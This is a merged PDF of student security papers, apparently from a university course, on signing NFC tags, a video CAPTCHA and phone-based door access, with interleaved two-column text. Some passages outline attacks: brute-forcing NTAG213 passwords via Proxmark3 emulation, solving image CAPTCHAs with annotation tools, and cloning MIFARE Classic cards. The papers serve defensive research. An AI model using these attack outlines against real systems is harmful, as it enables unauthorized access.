transmission of information. It can store various MIME types coupled with the fact that most smartphones come equipped with
such as URL, Credentials to a wireless access point or text file. a NFC reader/writer, any person with such devices will be able to
Typically, smartphone operating system will open application to write their own NFC tags at a very low cost. As such, it can be
serve the content of the NFC tags to the users. assumed that this mode of attack will be relatively easy to do for
the attacker.
3.2 Vulnerabilities In fact, as seen in ATM skimming attacks, given enough time and
NTAG203/NTAG213 can be commonly found in public spaces, effort, attackers will be able to produce skimmers that are nearly
such as bus stops, where it is used as a means to disseminate indistinguishable from a legitimate card swipe mechanism on an
information. ATM. This spells trouble for malicious NFC tags, which are way
easier and faster to obtain and replicate.
For example, Clear Channel Singapore [8], an outdoor advertising
company, makes use of NFC in their various advertisement 3.3.2 Brute force attacks on NTAG213
platform offerings to encourage users to interact with the The newer variant, NTAG213, features a password system to
displayed content. According to the company, the NFC- restrict unauthorized access and also contains a safety mechanism
incorporated advertising platforms can enable the target audience to lock itself after a defined number of failed password attempts.
to interact with the advertised content in a variety of ways; such as Given this, one would expect that brute force attacks should be
by purchasing vouchers on the spot, downloading music or less effective on the NTAG213.
videos, or simply browsing the information that is being offered.
Clear Channel claims that they are operational at 8 out of every 10 It is, however, unfortunate that despite having the aforementioned
bus stops in Singapore, and that a two-week advertising campaign security mechanisms in place, it is still possible for an attacker to
can generate an outreach of 80% of the population. This presents read and emulate a NTAG213 tag that has such locks enforced,
a worrying situation as its ease of use and availability can serve as even with a very small allowed number of failed password
gp04
PDFsam_merge 26
30
attempts (e.g. 3). With the use of Proxmark3, a powerful general- digest, i.e. H(m) = H(m’). Since Signature(H(m)) =
purpose RFID tool, the attacker can emulate and launch a brute Signature(H(m’)), the adversary will able to forge a signature with
force attack even with such restrictions [11]. By emulating the tag, the hash collision. Therefore, we chose SHA384 as our choice of
the counter for number of password attempts for the original tag a cryptographically secure hash. Additionally, with the use of this
will thus be maintained at 3. This allows the attacker freedom to hash, performance can be improved in terms of easier
brute-force all possible password combinations in a relatively computation of the signature.
small amount of time, given that there are at most 10000 different
password combinations available for the 4-digit (32-bit) 4.3 Elliptic Curve Digital Signature
password. Algorithm (ECDSA)
The NTAG213 has a storage limit of 144 bytes, while the length
3.4 Remarks on Existing Exploits of a typical URL can take 40 bytes or more. This leaves us with
Even though some form of security mechanism is implemented in 144 - 40 = 104 bytes to work with for the digital signature. A
both NTAG203 and NTAG213, they prove to be ineffective when Base64-encoded 256-bits signature takes up 96 characters (bytes),
faced with modern methods of attack. If we were to incorporate making it just enough to fit into the NFC tag.
security into NFC tags properly, authenticity and integrity are key Since ECDSA uses Elliptic Curve Cryptography, it allows us to
components that cannot be overlooked. Therefore, our proposed use a relatively smaller number of bits for comparable security
implementation shall address methods where security can be levels with other Public Key Infrastructure (PKI) cryptographic
retrofitted to NTAG203 and NTAG213 to guarantee authenticity schemes such as RSA and Elgamal.
and integrity in a scalable, and also backward compatible manner.
A signer has the ability to choose any named curves to be used
according to their specific security requirements, as long as
OpenSSL supports them. This is useful for when a specific
4. DESIGN CONSIDERATIONS domain requires a smaller key length to allow more space for a
Before we move on to our solution, we will discuss the longer URL, or a larger key length can be used for domains with
considerations undertaken in the design process. As discussed in shorter URLs.
the previous section, it is crucial that we guarantee authenticity Our recommendation is the Prime256v1 curve. The security of the
and integrity in NTAG203 and NTAG213. To be able to use it 256 bits of ECC is comparable to the security of the 3072 bits of
seamlessly with both older and newer tags, our solution also has RSA and ElGamal [12]. Not only that, it should fit in the NFC tag
to be scalable and backwards compatible. together with an average URL length. According to NIST’s
recommendation [13], 256 bits of Elliptic Curve is secure beyond
4.1 Security Requirements 2030. Other curves such as prime192v3 or prime239v3 can also
be used. They are 192 bits and 239 bits respectively.
4.1.1 Fundamentals
• Authenticity: Given two NFC tags, n and n’, we must be 4.4 PKI
able to know if these tags come from trustworthy sources. PKI is used as an infrastructure to securely transfer the public
• Integrity: The data that is stored inside the NFC tags must keys as a form of certificate. It also makes our business flow
not have been tampered with. We must also be able to make highly scalable. Suppose companies express interest in using our
a judgement call on whether to load the data based on application for securing their advertisement-purposed NFC
whether it has been tampered with or not. stickers. If they already own a public certificate signed by a
trusted Certificate Authority, we will have no issues verifying
• Non-repudiation: The signer of the tag is not able to deny their identity and deeming them as trustworthy content providers.
that the tag is signed by them. The exact business flow will be discussion on later in section
5.2.1.
4.1.2 Attack models of adversary
These are the possible attack models that an adversary can 4.5 Revocation of Certificate
employ. In the event where a registered company’s private key is leaked or
compromised, their certificate has to be revoked for security
• Total break: The adversary wants to find our private key.
reasons. In our implementation, all public keys belonging to our
• Selective forgery: Given a message m, the adversary wants registered organisations are hosted on our database and will only
to forge the signature. be downloaded into our mobile application when necessary. To
achieve this revocation of certificates, our website can do a push
• Existential forgery: The adversary wants to create valid notification to our mobile application to purge the cache of a
message-signature pairs (m,s) that are valid. revoked certificate.
gp04
PDFsam_merge 27
31
5. PROPOSED SECURITY the public certificate of the domain from the application storage,
which will be used for decryption later on.
IMPEMENTATION
Let the public certificate for the domain be as follows, in Figure 2:
5.1 RetrofitSecureNFC
RetrofitSecureNFC is an android application that is able to run
on any smartphone with a NFC scanner and with Android 5.0 or
later as its operating system. It makes use of Spongy Castle [14], a
cryptographic library for Android.
5.1.1 How it works
In Android, an application can get notified of a NFC event from
the operating system by subscribing to events such as:
• ACTION_NDEF_DISCOVERED
• ACTION_TECH_DISCOVERED
• ACTION_TAG_DISCOVERED
ACTION_NDEF_DISCOVERED event enables applications
that are not running in the foreground to handle an NFC event.
However, it requires the application to subscribe to domains that
Figure 2. Public certificate for domain
it intends to handle at compile-time. The subscribed domains must
be at least a Partially Qualified Domain Name (PQDN) with a The text representation of the certificate above can be found in
third-level-domain name i.e. *.nus.edu.sg and it cannot be a Figure 3:
wildcard i.e. *.sg or *.
For instance, if RetrofitSecureNFC subscribes to the
*.nus.edu.sg domain, then the Android OS will run
RetrofitSecureNFC to handle such links belonging to registered
domains. This subscription example can be found in the code
snippet depicted in Figure 1 below.
gp04
PDFsam_merge 28
32
Next, the digital signature in binary representation is decrypted Figure 5. RetrofitSecureNFC: successful authentication screen
using the public certificate we fetched earlier to obtain a SHA384 On the other hand, if our application cannot verify the authenticity
hash of the URL. The resultant hash of SHA384(URL) will thus of the NFC tag being read, the user will be prevented from
look something like this: proceeding with the data read. Figure 6 shows the screen
aa1a4c76a1ec9220f10f03baba96e7d3d0e79f8751a5 displayed when an NFC tag cannot be authenticated.
529814dba513dbaac715cee65b928231754a8b91f571
a6277de9
Following that, we get the substring of the original URL without
the sig parameter, and do a SHA384 hash on that URL. Finally,
we do a comparison between the two hashes, and if they are equal,
we are able to verify that the identity of the URL is authentic.
If the two hashes do not match, we can assume that the payload
has been tampered with, and refuse connection to the URL inside
the tag. This way, we allow for a mechanic to authenticate and
secure the NFC tags.
gp04
PDFsam_merge 29
33
OpenSSL, then generate a CSR from it. We only take 8. ACKNOWLEDGEMENTS
CSR from Company A. The authors of this paper would like to extend their gratification
3. We validate the CSR, extract Company A’s public key to A/Prof Hugh Anderson for his guidance and support
from the CSR and sign a public certificate. throughout this project, helping us to procure the NTAGs and
4. We will include the certificate in our application and card readers for our project and offering timely feedback on the
also send it back to the company. direction of the project.
gp04
PDFsam_merge 30
34
[13] Giry, D. (2017, February 23). Cryptographic Key Length
Recommendation. Retrieved November 10, 2017, from
https://www.keylength.com/en/4/
[14] Spongy Castle. (n.d.). Retrieved November 10, 2017, from
https://rtyley.github.io/spongycastle/
gp04
PDFsam_merge 31
35
PDFsam_merge 36
VideoCaptcha
Ong Liwei Lim Wei Jie Marcus Ng Wen Jian
School of Computing, National School of Computing, National School of Computing, National
University of Singapore University of Singapore University of Singapore
21 Lower Kent Ridge Rd 21 Lower Kent Ridge Rd 21 Lower Kent Ridge Rd
Singapore 119077 Singapore 119077 Singapore 119077
+65 98578398 +65 88766462 +65 97502493
a0124093@u.nus.edu e0003013@u.nus.edu e0003142@u.nus.edu
Mooi Chung Yu Dexter Low Bao Ling Vivian
School of Computing, National School of Computing, National
University of Singapore University of Singapore
21 Lower Kent Ridge Rd 21 Lower Kent Ridge Rd
Singapore 119077 Singapore 119077
+65 98317385 +65 98317385
a0124586@u.nus.edu e0002546@u.nus.edu
ABSTRACT
In this paper, we investigate the phenomenon of Completely Table 1. List of CAPTCHA solving services online
Automated Public Turing tests to tell Computers and Humans (non-exhaustive)
Apart (CAPTCHA) being broken with increasing accuracy: the
attack vectors and current mitigations.
We document our attempt to make an enhancement to this
existing captcha to make a captcha that easy to solve for humans
but harder to break for bots.
Keywords
Video CAPTCHA, Automated Turing Test
1. INTRODUCTION
Conventional CAPTCHAs revolve around getting users to
identify distorted letters and have been the go-to method of
deterring bots for years. As mentioned in our project objective, we
noticed that such captchas are being solved with alarming ease by
machines (aka bots).
We attribute one of the main reasons to the increasing
“intelligence” of software - technological advancements in the
recent years have reduced the average difficulty in automating
captcha solving. CAPTCHA-solving services can be found online 2. CONCERNS
easily; such services may achieve their objective through optical
character recognition (OCR), or data curation of as many captcha 2.1 Security
images as possible. On a lower level, open-source libraries with Security of the CAPTCHA process is definitely the main concern
trained OCR models (such as pyocr and pytesseract) are widely for software systems or web applications. If bots were able to
available to allow almost anyone to automate a CAPTCHA attack. break CAPTCHA defences with such ease, then not only would it
[1] not deter spam traffic, but damage the business. We look at some
of the methodologies (attack vectors) employed.
gp05
PDFsam_merge 33
37
2.1.1 Optical Character Recognition (OCR) Figure 2: Disability statistics in North America region
This machine-learning based method has been widely used to
solve text-based visual CAPTCHAs, as mentioned in Section 1.
The fundamental concept of OCR involves feeding binary 3. RECTIFICATION
representations of distorted text images as inputs into a trained We set out to investigate and assess a few of the approaches taken
neural network. by several companies and/or websites in recent times to mitigate
the aforementioned phenomenon, and after obtaining the
2.1.2 Replay attack necessary information brainstorm on how we can re-innovate the
Several CAPTCHA implementations associate a session ID or key captcha process without losing its initial intended purpose.
with a every CAPTCHA challenge. Attackers can simply utilize
the solution to one image multiple times by reusing the key. Such 3.1 Gamified CAPTCHA
an attack can also be classified under weak implementation/design FunCAPTCHA came up with the idea of amalgamating games
flaw. Such attacks are less prevalent now as mitigation is fairly with the CAPTCHA-solving process. Users are given an image of
simple: adding expiration to every session ID, or enforcing an animal writ large, that is not upright, and are asked to rotate
one-time use. them to an upright position using the left and right buttons
2.1.3 Hash tables provided. While there is no additional level of security provided
with this variation, it does attempt to mitigate the issue of bad user
This vector of attack is specific to object-based CAPTCHA
experience generally associated with CAPTCHA solving.
(Section 4.1). By outsourcing CAPTCHA challenges to be
manually solved by humans, attackers are able to amass a large 3.2 Object-based CAPTCHA
database of CAPTCHA-answer pairs.
2.2 Accessibility
Accessibility issues has been one of the topics that has sparked
much controversy for adopting CAPTCHA systems. In North
America alone, nearly 50% of internet users suffer from some
form of disability. In particular, users with reading/seeing
difficulties and color blindness make up 32% of the population.
[2] These users are most affected by CAPTCHAs and require
alternative methods to be identified as a human. CAPTCHA
providers have to factor this into consideration when developing
alternative CAPTCHA methods.
The main alternative for visual CAPTCHAs currently are audio
CAPTCHAs, where users are supposed to input the letters which
are heard from the spoken audio clip. The audio clips are
deliberately noise enhanced to make any form of programmatic
voice recognition difficult. Even so, this CAPTCHA method is
still easier to decode compared to current CAPTCHA evolutions
as discussed in Section 3. The trade-off from employing such
implementations is that a majority of them have severe
accessibility issues. As such, CAPTCHA providers have to
include an audio-based alternative together with their visual-based Figure 3. Object-based CAPTCHA
widgets. [3] This opens up an attack vector similar to a downgrade
attack, where bots are able to opt for audio-based CAPTCHA reCAPTCHA’s 2014 release features a CAPTCHA system that
verification. required users to select images out of nine that contained a
particular object. The motivation for this CAPTCHA variation is
that solving these CAPTCHAs using image recognition would be
much harder to perform than the text-based ones.
Documented attempts to break the image-based CAPTCHA has
been mildly successful; by utilizing several image annotation tools
- one of them being Google’s own Google Reverse Image Search
(GRIS) - and aggregating the classification results, a group of
university students were able to solve a stratified sample of
reCAPTCHA tests programmatically with up to 60% accuracy.
[4] The algorithm for solving a single CAPTCHA process is as
follows:
1. Identify target object name.
2. Extract the first image from the CAPTCHA and feed it
into the image annotation module to obtain the image
classifier tags.
gp05
PDFsam_merge 34
38
3. Compare the object name with the tags; if a match is 3.5 Invisible CAPTCHA
found, select the image.
4. Repeat steps 2-3 for the remaining 8 CAPTCHA reCAPTCHA’s latest release (2017) took its one-click CAPTCHA
images. a step further by removing any form of user interaction altogether.
[7] By analyzing information of the browser used to access the
By further storing and reusing the classification results from the webpage, as well as user browsing history through the use of
above algorithm, Google’s large database of object images, the cookies, reCAPTCHA is able to identify if the incoming traffic is
solving accuracy increased to 70%. from a human or a bot.
Due to the performance bottleneck in the image classification 3.6 Video-based CAPTCHA
phase, each CAPTCHA process took an average of 20 seconds. We take a look at video-based CAPTCHAs offered by
The demonstration highlights the need for enhancements to this NuCaptcha. NuCaptcha displays animated distorted texts in a
type of CAPTCHA method. video which typically scrolls from one edge of the screen to
3.3 Behavior Analysis another, and users are required to enter the text that is in a
different color than the rest. Random unrelated clips will be
Shortly after their release of the object-based CAPTCHA, played in the background to increase the difficulty for machines to
reCAPTCHA introduced an enhancement to its CAPTCHA identify the moving texts. [8]
system that only requires users to check a tick box. [5] Titled
NoCAPTCHA, it uses advanced risk analysis that tracks the entire 4. VIDEOCAPTCHA
user interaction from the point the CAPTCHA widget renders on
the web page to the point which the checkbox is checked. For 4.1 Introduction
example, the entire path of the mouse pointer taken by a human VideoCaptcha uses the idea that it is harder for bots to process
and a bot differs significantly, and can be leveraged on to information through animation compared to static images and is
distinguish between authentic users and spammers (programmable computationally harder to perform analysis.
webdrivers like Selenium would trigger the checkbox
instantaneously). The video captcha will show a few images at random and display
a short clip that is related to at least one of the displayed images.
The user will then be prompted to answer a question and select the
image that best fits as the response. If the user has selected the
correct response, then they will be re-directed to the target page.
Otherwise, a new set of clip and images will be randomly chosen
and displayed.
Figure 4: One-click CAPTCHA widget by Google’s
reCAPTCHA
gp05
PDFsam_merge 35
39
select the first option and still able to achieve a theoretical 25% user, where every user that sends a request instantaneously to our
success. server will be rejected as this ‘user’ is likely to be non-human.
Another scheme that we have thought is to create another time
4.2.2 Accessibility period scheme that is inspired by NoCAPTCHA reCAPTCHA. In
Similar to other visual-based CAPTCHAs, users with difficulty in this additional implementation, we will impose a timeout period
seeing will be unable to perform the CAPTCHA test properly. (e.g. 10s) for every user before we close the session with the user.
By doing so, other users will be more likely to be able to access
4.2.3 Human computation this page as no other user can remain in the page beyond the
This captcha may remain vulnerable if the attacker managed to do stipulated time period.
a run through all of our captcha and stores the captcha and its
corresponding answers in their knowledgebase. By doing so, it
allows bots created by the attacker to be able to conduct
successful attacks by searching their database and replay the 6. ACKNOWLEDGEMENTS
answer, assuming that storage at attacker’s side is possible. We would like to show our appreciation to Dr. Hugh Anderson for
presenting us the opportunity to explore on the topic regarding
4.2.4 Denial of Service CAPTCHA.
Many bots can flood our server by constantly and deliberately
selecting the wrong answer. This may prevent genuine access by
the users who are trying to access the page. 7. REFERENCES
[1] “Advanced Web Scraping: Bypassing "403 Forbidden,"
5. Enhancements captchas, and more” Evan Sangaline 2017-03-14. Retrieved
5.1.1 Improving answer choices 26 Oct 2017.
http://sangaline.com/post/advanced-web-scraping-tutorial/
Increasing the number of choices will reduce the chance of
successful attack. Alternatives include enhancing our video along [2] “Captcha Technologies Market Share and Web Usage
with a text captcha, and adding a secondary open-ended question Statistics”. SimilarTech. Retrieved 2017-11-04
which requires another input from the user. This alternative https://www.similartech.com/categories/captcha
enhancement is inspired by NuCaptcha. The questions to be asked [3] “Section 508 CAPTCHA: How to Make CAPTCHA Comply
here will be similar to that of a normal text captcha i.e. “Type in with Access Board Section 508 Standards”. Captcha.com.
the two words displayed in the video”. Furthermore, this text input Retrieved 2017-11-04
will always be a random input of string that is generated every https://captcha.com/accessibility/section508-captcha.html
time then placed into the video. Thus, with another layer of check,
our video CAPTCHA be more reliable and less prone to attacks. [4] Claudia Cruz-Perez; Oleg Starostenko; Fernando
Uceda-Ponga; Vicente Alarcon-Aquino; Leobardo
5.1.2 Improving Accessibility Reyes-Cabrera (30 June 2012). "Breaking reCAPTCHAs
An audio-based CAPTCHA could be implemented in the video with Unpredictable Collapse: Heuristic Character
CAPTCHA to allow people who are disabled to be able to gain Segmentation and Recognition". In Carrasco-Ochoa, Jesús
access. Ariel; Martínez-Trinidad, José Francisco; Olvera López, José
Arturo; Boyer, Kim L. Pattern Recognition. Lecture Notes in
5.1.3 Preventing Human Computation Computer Science. 7329. México. pp. 155–165.
Upon improving the answer choices with the alternative method doi:10.1007/978-3-642-31149-9_16. ISBN
of adding additional text input field where text is also a random 978-3-642-31148-2.
string of text generated that will be placed in the video, our [5] "Are you a robot? Introducing "No CAPTCHA
keyspace will be significantly huge. Additionally, human reCAPTCHA"". Google. 2014-12-03. Retrieved 2017-11-04.
computation attack can be prevented by tracking using our own https://security.googleblog.com/2014/12/are-you-robot-intro
personal logs (e.g. htAccess/cPanel). Through such tracking, we ducing-no-captcha.html
will be able to detect the user that is currently attempting to store
our videos, images and text. After which, simply ban this user. As [6] “InsideReCaptcha” ReCaptchaReverser. 2014-12-10.
such, the attacker is highly unable to store all possible set of Retrieved 2017-11-04.
answers, especially when the text is always randomly generated, https://github.com/neuroradiology/InsideReCaptcha
before inserting into the video. [7] Certification, Digital (2017-03-14). "Digital Certification:
5.1.4 Preventing Denial of Service The Digital Rating For Websites". Digital Certification |
Blog. Retrieved 2017-11-04.
A general idea of preventing DOS is to impose lower bandwidth https://digital-certification.com/blog/google-improves-their-c
and query resource from any source/client after every single aptcha-with-no-user-interaction-required/
attempt and access to our webpage. An implementation of
imposing a fixed number of tries a particular user can fail before [8] "Animated CAPTCHA tech aims to fox spambots". The
imposing a time penalty (e.g. 10 mins) is one way whereby we Register. Retrieved 2017-11-04.
can reduce the chance of a DOS attack. This can be done by either https://www.theregister.co.uk/2010/07/01/animated_captcha/
tracking the IP address of the client. To further enhance this
implementation, another timer can be set and tracked for every
gp05
PDFsam_merge 36
40
Smart Door Authentication System
Tan Jia Shun Tan Wang Leng Tean Zheng Yang
National University of National University of National University of
Singapore Singapore Singapore
jiashun.t@u.nus.edu wangleng@u.nus.edu teanzhengyang@u.nus.edu
ABSTRACT into detail about how to exploit the current system, but rather
The NUS smart card system is currently being used to restrict explore the possibility of a more secure system.
unauthorized students from being able to access certain sensitive On top of the vulnerabilities associated with the MIFARE Classic
areas of the school compound. However, at present, smart cards cards, there are also numerous ways a user could exploit the NUS
are becoming increasingly vulnerable to attacks such as cloning. smart card system. For example, the smart card could be obtained
An attacker could make use of current technologies in order to by an unauthorized adversary via an existing student or staff. The
obtain a clone of a valid NUS smart card to gain access to adversary could obtain the card in numerous ways such as getting
restricted areas. Hence, this paper will explore the feasibility of a it willingly from the authorized personnel himself, stealing it from
Smart Door Authentication system which employs Multi-factor an authorized personnel via social engineering means or even just
Authentication, using phones as a replacement for the currently perhaps picking up a missing card from the floor. Once an
insecure NUS smart cards. unauthorized adversary has obtained an NUS smart card, he could
use the card to enter areas which he normally would not be able to
1. INTRODUCTION access. This is a large security flaw as due to the nature of NFC
technology used, the identity of the authorized personnel is often
The usage of smart cards are becoming increasingly commonplace
not verified against the identity of the person using the card. For
due to the innovation of new Near Field Communication (NFC)
example, a non-student adversary could access the student labs or
technologies. These cards are being used in various different ways
the central library by putting a student’s NUS smart card in his
ranging from pay-wave systems such as VISA Paywave to area
wallet and by utilizing NFC to grant him access to these restricted
access using NUS Matriculation cards.
areas, his identity as a non-student will not be revealed.
However, as the populace trends towards the usage of these cards,
new efficient and effective methods are being developed towards 3. PROPOSED SYSTEM
the attack of these cards as well. Therefore, there is a need for a
The Smart Door Authentication system taps on multi-factor
new system that would provide a higher level of security than the
authentication in order to improve security in the field of area
current one that we have now.
access. The aim of our system is to provide a higher level of
security without compromising too much on the ease of use.
2. EXISTING SYSTEM Therefore, we propose to the use of mobile phones to replace the
In 1994, MIFARE Classic revolutionized the contactless smart currently insecure, MIFARE Classic NUS Matriculation cards. In
card business by introducing a low-cost smart card that was able the system we propose, we use fingerprint biometric
to transmit encrypted data. authentication, issue two separate One Time Pass (OTP), one for
Currently, it is being used in a variety of applications worldwide, the Door and one for the student, as well as an IVLE token to
including our NUS matriculation card. However, in 2009, a new validate the student’s identity.
and improved attack on MIFARE classic was discovered. The Multi-factor authentication is a method of access control. A user
attack allows the adversary to recover the secret key via wireless is only granted access after presenting several separate pieces of
interaction with less than 500 queries to the vulnerable card. evidence to an authentication mechanism. The evidences typically
In spite of this vulnerability, the NUS matriculation cards that we consists of at least two of the following categories: knowledge
use today for authentication are MIFARE Classic cards. The (what they know), possession (what they have) and inherence
implication of the continual usage of vulnerable cards is that they (what they are).
are very susceptible to being cloned. A cloned MIFARE Classic Each student’s phone is bounded to his or her unique student id.
card would be able to grant an adversary access to restricted areas The student uses an android application in order to scan a unique
in the school compound, which in turn would be detrimental to RFID or QR code of a door the student wishes to access.
the school’s general security.
The android application will verify the validity of the student’s
Previous students of this module have done projects regarding the request by checking his fingerprint and student data against the
exploit of MIFARE Classic Cards (Exploiting the Security Lapses respective databases.
in the NUS Matriculation Card, 2016/17). Hence we shall not go
gp06
PDFsam_merge 37
41
This allows us to identify the student based on their knowledge
(via the IVLE token), possession (phone) and their inherence (via
Upon entering the application, the user sees the main menu:
fingerprinting).
Our system currently consists of 3 major software components
that handles the request to open the door – the Door Server, the
Android application and the Database.
The prototype implementation of the system can be found in
https://github.com/CS3235-1718-SEM1.
The overall schema is shown in the Appendix section.
gp06
PDFsam_merge 38
42
The user will tap the “Scan” button on the main menu. He or she permission to access the corresponding door. Otherwise, an HTTP
will then proceed to scan the QR code on the door (which is the 400 response is returned.
door’s id and OTP). The fingerprint authentication screen is
The OTP is generated from the user’s secret_key that changes at a
brought up afterwards.
regular interval. To protect against a brute-force attempt on the
Scanning via NFC OTP, the system records the last room access request and it only
Instead of tapping any button, the user will just have to be on the accept 3 room access request per second. This significantly
main menu, and bring his phone near the door’s NFC emitter. The reduces the amount of guesses an attacker can make on the OTP.
application will pick up the NFC’s record (which contains the Because the OTP changes every 30 seconds, the attacker can only
door’s id and OTP), and brings the user to the fingerprint make 90 brute-force attempts, out of the 10⁶ keyspace of the OTP.
authentication screen. As such, the probability of a successful brute-force attack is
roughly 1 in 10,000.
Both methods bring the user to the authentication stage. Upon
scanning the user’s fingerprint, the application, initiates an
HTTPS request to the door server with all the necessary 4. STRENGTHS AND WEAKNESSES OF
information (OTPs, door and user id) in order to unlock the door. PROPOSED SYSTEM
3.3 Database Access Layer 4.1 Strengths and Evaluations
The purpose of the Database Access Layer is to provide Our authentication system provides significantly higher security in
verification of the incoming requests against known and pre- the field of area access compared to the current NUS
collected data. Matriculation Card.
gp06
PDFsam_merge 39
43
fingerprint authentication is required to unlock the door. the user as his or her access will be denied even if all other factors
Furthermore, a smartphone is more expensive than a smartcard are positive.
(virtually $0 for the student), so the student will be more Based on a study done on fingerprint scanners, 85% of examiners
conscious about losing a smartphone versus a matriculation card. made at least one false negative error for an overall false negative
By doing so, we have effectively enforced non-repudiation of rate of 7.5%
room access. Even if the person is not present in the room, any However, in our system, we have not encountered any instances
incident that occurs will be directly his or her legal responsibility, of false negatives in our tests leading up to and during the STEPs
as he or she has authorized the access to the room. presentation. Therefore, perhaps this technology has progressed
significantly since the study done in 2010 and increased in
reliability since then.
4.1.3 Resistant against Brute Force or Cloning
Attacks 4.2.2 Fingerprinting authentication: Database
The student’s OTP is a 6 digit number that is generated using the manipulation
secret key. It is time-based, so a particular generated OTP is only The authenticated fingerprints are currently stored in the
valid for at most 30 seconds. smartphone’s fingerprint database.
It is difficult for a malicious attacker to brute force the secret key It is hard to guarantee that the smartphone’s fingerprint database
(as it is a base32 string of 40 characters). However, the malicious would not be maliciously tampered. For instance, a user might
attacker can attempt brute force the OTP token, by sending allow his friend to add his fingerprint to the smartphone, even
multiple HTTP requests to the door server, each request though such an action virtually allows him access to all
containing a different guess of the OTP. As described in the functionalities of his smartphone (instead of just only the door
previous section “Database Access Layer”, we thwart such an unlocking application), which pose a greater security risk to the
attempt by limiting requests to only 3 per second. user. Nevertheless, the user may do this out of convenience or
Hence, with both the request limitation and rotating OTP, brute ignorance.
forcing is theoretically challenging to do. A possible form of defence is to store fingerprint authentication
In contrast, a smartcard does not allow us to support a rotation information in the database access layer instead of relying on the
mechanism (since it is just a card and not a computing device). In smartphone’s database.
fact, as described under the “Existing System” section, cloning is The Android API does not divulge the fingerprint of the user to
possible since the content of the smartcard never changes, unlike the application. Instead, the application have to create a
our 30-second OTP. CryptoObject, and the android API would then sign this object
with the user’s fingerprint. Since only the user’s fingerprint would
4.1.4 Psychological Acceptability only be the one that can sign the object uniquely (other
Smartphone ownership is prevalent in Singapore. In the fingerprints will sign it differently), we can check the signed
Consumer Barometer research study done by Google, 91% of object with our Database Access Layer to verify that the person is
Singapore’s population owns a smartphone. indeed the user that registered his phone to our system, and not
someone else who has malicious gained access to the phone and
Therefore, as the prevalence of smartphone propagates throughout
added his own fingerprint to the smartphone’s database.
the world, it becomes more convenient for students to gain access
using their smartphone, rather than relying on them carrying With this new mechanism, the access point ‘/can_access_door’
around their matric card. This reduces the need of carrying an would now require a fingerprint authentication data (in the form
additional piece of plastic that would otherwise be not very useful of a signed object) as an additional parameter, before granting
in many other situations. access to the door.
gp06
PDFsam_merge 40
44
4.2.4 Insider Attacks access the list of users that have attended the event, and NUS staff
If the personnel in the Computer Centre has access to the are less trained than security personnel. Instead of a log file, the
smartphone door server database, it is possible for a personnel in database will also need new functionalities to generate the said list
the Computer Centre to collude with a malicious student. to support attendance taking.
The personnel can leak a victim’s secret key to a malicious
student’s smartphone app by deliberately hijacking the HTTP
5.1.2 Ease of use and speed of system
Currently, there is only one mode of operation for our system, this
request of the smartphone user registration protocol, and then
mode might not be optimal for every single use case.
insert any arbitrary secret key that he or she desires (preferably a
victim’s secret key) For example, in a high traffic and less sensitive location like NUS
library, the additional second spent on scanning the thumbprint on
The only form of defence against this attack is to ensure that the
the application might increase the jam of people trying to enter
personnel is never able to inspect the server database content in
during peak hours, in this case it might be better if the user can
the first place.
just tap his phone and the reader and enter the library.
4.2.5 Lost and stolen phones On the other hand, for high value and sensitive locations like
If a determined attacker armed with the necessary technical research labs, offices and server rooms we might want to enable
expertise and resources decide to attack a student to gain access to additional requirements such as every entry requiring the user to
NUS facilities decides to steal and hack the phone, there is a enter his or her IVLE user password or even require another
possibility that the attack might be able to gain unauthorised additional separate hardware authenticable factor such as yubikey
access to NUS facilities, we can mitigate this problem, since we to open the door to ensure that the person entering this restricted
have already implement the constraint that the user can only have area is indeed authorized.
one phone registered in the system, a user must report any lost to This various modes can be defined based on a sliding scale on the
the system administrator as soon as possible to regain access to importance and nature of the room that is being protected, a more
NUS facilities, with this we will know when phones are sensitive location can require additional validations before
compromised and can act quickly to revoke the lost/stolen phones opening a door, while this might take additional time, it helps
ability to open door. minimize the chances of unauthorized access, while less sensitive
At the same time we have to also consider the requirements to pull location with high traffic can have lesser validations to help
of such an attack on the system. increase the traffic throughput.
Firstly, the attacker will have to find an unreported lost or steal a
phone, then gain root access to the phone and attempt to use it to 6. SUMMARY
enter NUS before the administrator can lock the phone’s access. We have achieved a proof of concept that our entire system works
However we have to consider that today’s smartphones have built by creating the whole system from scratch. We have even created
in trackers, allowing owners to locate their phone remotely a model of a door using servo motors and Arduinos to prove that
making it hard for the attacker to get away with their attack, at the at least on a small scale, our system can function as a valid door
same time gaining root access to the phone is not a trivial act, it authentication system.
requires significant technical expertise that not every person might Our system which utilizes multi-factor authentication in order to
have. identify the person requesting access, is more secure than the
The point is raising the bar for hacking the system to make it current employed system using MIFARE Classic NUS
beyond economic for a casual malicious user. Currently to gain matriculation cards. However, there are several weaknesses of the
illegal access one can easily just scan and clone the already system that may affect the practicality of the implementation of
cracked MIFARE based matric card, so the bar is extremely low. the overall system. Perhaps in higher risk areas, our system or a
Our system raises the bar to make it more expensive than it is system with a higher security can be used.
worth for a casual attacker. MIFARE Classic is also an outdated piece of technology that
should be replaced as soon as possible due to security loopholes.
5. POSSIBLE FUTURE ENHANCEMENTS As smartphones are prevalent in modern society, we feel that it
together with the multitude of sensors that it comes with, people
5.1.1 Taking Attendance at Events will be able to use their phones for access control very often in the
As our smart door authentication system verifies that the person near future.
that scans the door is definitely the owner of the smartphone, we
can expand the functionality of the system to include non-door 7. GITHUB REPOSITORY
unlocking scenarios. One such scenario is attendance taking at https://github.com/CS3235-1718-SEM1
events organized by NUS staff.
As attendance taking is a non-security activity (compared to door 8. ACKNOWLEDGMENTS
unlocking), we need a separate server that is similar to the door We would like to thank Professor Hugh Anderson for his
server, but is crafted for events instead, so as to attain separation unwavering support and guidance, as well as provision of
of privileges. hardware to make this project possible. In addition, we would also
Currently, door accesses are logged in a log file and are accessible like to thank ourselves for a job well done as this project would
by security staff for auditing purposes only. As such, to support not be possible without the hard work and contribution of every
attendance taking, we will require a more user-friendly GUI for single member in the team.
event organizers to use the system with ease, as they will need to
gp06
PDFsam_merge 41
45
We would also like to thank everybody for their kind and [3] S. Rosenblatt, J. Cipriani. 2015. Two-factor authentication:
constructive comments at our STEPs presentation. We hope that What you need to know (FAQ). Retrieved from:
with our new found knowledge and wisdom, one day we are able https://www.cnet.com/news/two-factor-authentication-what-you-
to make the world a safer place, one door at a time. need-to-know-faq/
[4] Courtois, Nicolas T. 2019. The Dark Side of Security by
9. REFERENCES Obscurity and Cloning MiFare Classic Rail and Building Passes
[1] Chen-Mou Cheng. 2010. MIFARE Classic: Completely Anywhere, Anytime
Broken. Retrieved from:
[5] Consumer Barometer research study. Retrieved from:
http://hitcon.org/download/2010/11_MIFARE%20Classic%20IS
%20Completely%20Broken.pdf
